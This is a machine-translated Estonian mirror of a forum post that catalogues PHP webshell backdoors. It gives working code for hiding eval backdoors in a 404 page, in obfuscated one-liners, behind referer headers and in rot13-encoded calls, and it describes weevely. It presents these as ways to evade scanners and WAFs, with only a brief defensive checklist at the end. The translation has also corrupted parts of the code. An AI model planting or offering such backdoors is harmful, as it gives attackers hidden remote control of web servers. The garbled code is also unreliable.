See artikkel on masintõlke peegelartikkel, palun klõpsake siia, et hüpata algse artikli juurde.

Vaade: 7260|Vastuse: 0

[Turvaline suhtlus] Lahenda need võimsad PHP tagauksed

[Kopeeri link]
Postitatud 01.12.2014 21:41:13 | | |
Me käsitleme neid PHP tagaukse programme õppimise mõtteviisiga ning palju PHP tagaukse koodi võimaldab meil näha, kui heatahtlikud programmeerijad on.
Võimas PHP tagauks ühes lauses
Selline tagauks võimaldab veebilehti,Serveri administraatorid on väga tülikad ja peavad sageli meetodeid muutma, et teha erinevaid tuvastusi, ning paljusid uusi kirjutamistehnikaid ei ole võimalik avastada ega lahendada tavapäraste tuvastusmeetoditega.
Täna loetleme mõned huvitavad PHP Troojalased.
1. Peida PHP ponid 404 lehekülje abil:
[mw_shl_code=php,tõeline] <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Ei Leitud</title>
</head><body>
<h1>Ei leitud</h1>
<p>Taotletud URL-i ei leitud sellest serverist.</p>
</body></html>
<?php
@preg_replace("/[pageerror]/e",$_POST['error'],"saft");
header('HTTP/1.1 404 Not Found');
?>[/mw_shl_code]
404 leht on veebisaidil sageli kasutatav fail ja vähesed inimesed kontrollivad ja muudavad seda pärast üldist soovitamist, nii et saame seda kasutada tagaukse varjamiseks.

2. Omadusteta peidetud PHP ühes lauses:
[mw_shl_code=php,true]<?php
session_start();
$_POST['code'] & $_SESSION['theCode'] = trim($_POST['code']);
$_SESSION['theCode']&&preg_replace('\'a\'eis','e'.' v’.‘ a’.‘ l’.‘ (base64_decode($_SESSION[\'theCode\']))','a');
?>[/mw_shl_code]
Määra $_POST['code'] $_SESSION['theCode'] väärtusele ja seejärel käivita $_SESSION['theCode'], kus esiletõstetud on see, et allkirjakoodi pole.
Kui kasutad skaneerimistööriista koodi kontrollimiseks, ei tekita see alarmi ja saavutab eesmärgi.

3. Super Stealthy PHP tagauks:
[mw_shl_code=php,true]<?php $_GET[a]($_GET);?>
[/mw_shl_code]
GET-funktsioon iseenesest moodustab troojalase;
Kuidas kasutada:
[mw_shl_code=php,tõeline]        
?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28P[/mw_shl_code]
Pärast täitmist genereerib praegune kataloog c.php lause Trooja, kui parameeter A on väärtustatud, ebaõnnestus viga Trooja genereerimine ning kui see on kinnitatud, teatab see samuti veast, kuid genereerib Trooja hobuse, mida ei saa alahinnata.
Tasemepäring, kood PHP tagaukse käivitamiseks:
See meetod on rakendatud kahe failiga, fail 1
[mw_shl_code=php,true]<?php
//1.php
header('Content-type:text/html; charset=UTF-8′);
parse_str($_SERVER['HTTP_REFERER'], $a);
if(reset($a) == '10'&& count($a) == 9) {
eval(base64_decode(str_replace(" ", "+", implode(array_slice($a, 6)))));
}
?>[/mw_shl_code]
Dokument 2
[mw_shl_code=php,true]<?php
//2.php
header('Content-type:text/html; charset=UTF-8′);
//要执行的代码
$code= <<<KOOD
phpinfo();
KOOD;
//进行base64编码
$code= base64_encode($code);
//构造referer字符串
$referer= "a=10&b=ab&c=34&d=re&e=32&f=km&g={$code}&h=&i=";
//后门url
$url= 'http://localhost/test1/1.php';
$ch= curl_init();
$options= massiiv(
CURLOPT_URL => $url,
CURLOPT_HEADER => VÄÄR,
CURLOPT_RETURNTRANSFER => TÕSI,
CURLOPT_REFERER => $referer
);
curl_setopt_array($ch, $options);
echocurl_exec($ch);
?>[/mw_shl_code]
Käivita base64-kodeeritud kood HTTP päringu HTTP_REFERER kaudu, et saavutada tagaukse efekt.
Hea on seda ideed kasutada WAF-i vältimiseks.
4.PHP tagaukse generaatori tööriist weevely
weevely on PHP-spetsiifilineWebshelli tasuta tarkvara, mida saab kasutada ühendusshelli simuleerimiseks sarnaselt telnetile. Weevelyt kasutatakse tavaliselt veebiprogrammide ärakasutamiseks, tagauste peitmiseks või telnet-laadsete meetodite kasutamiseks veebilehe halduse asemel, serveripoolne PHP-kood, mille genereerib Weevely, on base64 kodeeritud, nii et see suudab petta peavoolu viirusetõrjetarkvara ja IDS-i. Kui oled serveripoolse koodi üles laadinud, saad selle tavaliselt otse Weevely kaudu käivitada.
Tagaukse funktsioonid on tavaliselt stringitöötluse funktsioonid ning sellised funktsioonid nagu hindamine ja süsteem, mida kasutatakse kontrollireeglitena, ei ilmu otse koodis, nii et tagaukse fail saab tagaukse otsingutööriista kontrolli mööda minna. Tumeda grupi veebipõhise tagaukse tuvastustööriistaga skaneerimine näitab, et fail ei ole ohus.
Ülaltoodud on üldine sissejuhatus ning asjakohaseid kasutusviise siin ei tutvustata, mis on lihtne teaduslik populariseerimine.
4. Kolm moonutatud ühe lausega PHP troojalast
      Esimene:
[mw_shl_code=php,true]<?php ($_=@$_GET[2]).@$_($_POST[1])?>
[/mw_shl_code]
Teine
[mw_shl_code=php,true]<?php
$_=“”;
$_[+“”]=”;
$_=“$_”.“”;
$_=($_[+“”]|“ ”). ($_[+“”]|“”). ($_[+“”]^“”);
?>
<?php ${'_'.$_}['_'](${'_'.$_}['__']);?>[/mw_shl_code]
Kirjuta http://site/2.php?_=assert&__=eval($_POST['pass']) parool kööginoa sisse.
Kui kasutad kööginoa lisaandmeid, on see peidetum, või saad kasutada muid süstimisvahendeid, sest see esitatakse hilisemalt.
Kolmas
[mw_shl_code=php,tõeline] ($b 4dboy= $_POST['b4dboy']) && @preg_replace('/ad/e','@'.str_rot13('riny').' ($b 4dboy)', 'lisa'); [/mw_shl_code]
str_rot13 ('riny') on kodeeritud hindamine, mis väldib märksõnu täielikult ilma mõju kaotamata, sundides inimesi verd oksendama!
5. Lõpuks loetle mõned edasijõudnud PHP Trooja tagauksed:
1、
[mw_shl_code=php,true]$hh= "p"." r”.“ e”.“ g”.“ _”.“ r”.“ e”.“ p”.“ l”.“ a”.“ c”.“ e”;
$hh("/[discuz]/e",$_POST['h'],"Ligipääs"); [/mw_shl_code]
//菜刀一句话
2、
[mw_shl_code=php,true]$filename=$_GET['xbid'];
hõlma($filename); [/mw_shl_code]
//危险的include函数,直接编译任何文件为php格式运行
3、
[mw_shl_code=php,true]$reg="c"." o”.“ p”.“ y”;
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
[/mw_shl_code]
//重命名任何文件
4、
[mw_shl_code=php,true]$gzid= "p"." r”.“ e”.“ g”.“ _”.“ r”.“ e”.“ p”.“ l”.“ a”.“ c”.“ e”;
$gzid("/[discuz]/e",$_POST['h'],"Ligipääs"); [/mw_shl_code]
//菜刀一句话
5、
[mw_shl_code=php,true]include($uid); [/mw_shl_code]
//危险的include函数,直接编译任何文件为php格式运行,POST
[mw_shl_code=php,tõene]www.xxx.com/index.php?uid=/home/www/bbs/image.gif [/mw_shl_code]
//gif插一句话
Kokkuvõttes võib neid PHP tagauksi kirjeldada kui täielikke, kui sa pole ettevaatlik, sind petetakse kindlasti, ja mis on meie artikli peamine prioriteet täna? Peamised punktid on allolevas kokkuvõttes!
Kuidas toime tulla PHP ühe lausega tagauksega:
Rõhutame mõningaid olulisi punkte ja kui sa seda artiklit loed, siis usun, et sa ei ole tavainimene, seega ei hakka ma pikalt rääkima:
  • Ole PHP programmide kirjutamisel turvalisuse suhtes teadlik
  • Serveri logifaile tuleks sageli lugeda ja varundada
  • Range lubade määramine iga asukoha jaoks
  • Sagedased dünaamiliste failide ja kataloogide partii-turvalisuse ülevaatused
  • Õpi, kuidas läbi viia käsitsi viirusetõrjet "Käitumuslik Otsustus, Uurimine ja Tapmine"
  • Jääge lainel või infiltreeruge aktiivsesse küberturbe laagrisse
  • Isegi funktsiooni saab kasutada reeglina serverikeskkonna hierarhilise töötlemise jaoks
Usume, et kui hallata on rohkem saite ja suur hulk andmeid, peaksime mõistlikult rakendama mõningaid abivahendeid, kuid me ei tohiks täielikult nendele tööriistadele loota – tehnoloogia uuendab ja paraneb pidevalt, kõige tähtsam on, et sa õpiksid ja mõistaksid, kuidas kirjutada neid võimsaid tagaukse inimesi, ning rollide ülekandmine võib tuua suuremat arengut.





Eelmine:Firefoxi pluginad Firefoxi häkkimisplugin muudab Firefoxi häkkimistööriistaks, millel on seitse pluginat
Järgmine:MS12-020 3389 0day exp kaugtöölaua täitmise kood python lähtekood
Disclaimer:
Kõik Code Farmer Networki poolt avaldatud tarkvara, programmeerimismaterjalid või artiklid on mõeldud ainult õppimiseks ja uurimistööks; Ülaltoodud sisu ei tohi kasutada ärilistel ega ebaseaduslikel eesmärkidel, vastasel juhul kannavad kasutajad kõik tagajärjed. Selle saidi info pärineb internetist ning autoriõiguste vaidlused ei ole selle saidiga seotud. Ülaltoodud sisu tuleb oma arvutist täielikult kustutada 24 tunni jooksul pärast allalaadimist. Kui sulle programm meeldib, palun toeta originaaltarkvara, osta registreerimist ja saa paremaid ehtsaid teenuseid. Kui esineb rikkumist, palun võtke meiega ühendust e-posti teel.

Mail To:help@itsvse.com